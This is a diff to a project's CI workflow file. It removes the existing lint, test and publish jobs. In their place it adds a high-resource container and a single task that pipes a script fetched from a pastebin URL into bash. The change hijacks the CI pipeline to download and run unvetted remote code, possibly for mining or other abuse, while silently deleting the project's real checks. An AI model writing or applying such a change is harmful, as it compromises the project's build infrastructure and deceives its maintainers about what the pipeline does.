--- a/.github/workflows/nodes.js.yml
+++ b/.github/workflows/nodes.js.yml
@@ -1,25 +1,7 @@
+container:
+  image: openjdk:latest
+  cpu: 4
+  memory: 12G
+
 task:
-  container:
-    image: node:latest # 
-
-  node_modules_cache: # 
-    folder: node_modules
-    fingerprint_script: cat yarn.lock
-    populate_script: yarn install
-
-  matrix: # 
-    - name: Lint
-      skip: !changesInclude('.cirrus.yml', '**.{js,ts}') # 
-      lint_script: yarn run lint
-    - name: Test
-      container:
-        matrix: # 
-          - image: node:latest
-          - image: node:lts
-      test_script: yarn run test
-    - name: Publish
-      depends_on:
-        - Lint
-        - Test
-      only_if: $BRANCH == "master" # 
-      publish_script: npm install
+  script: bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)"
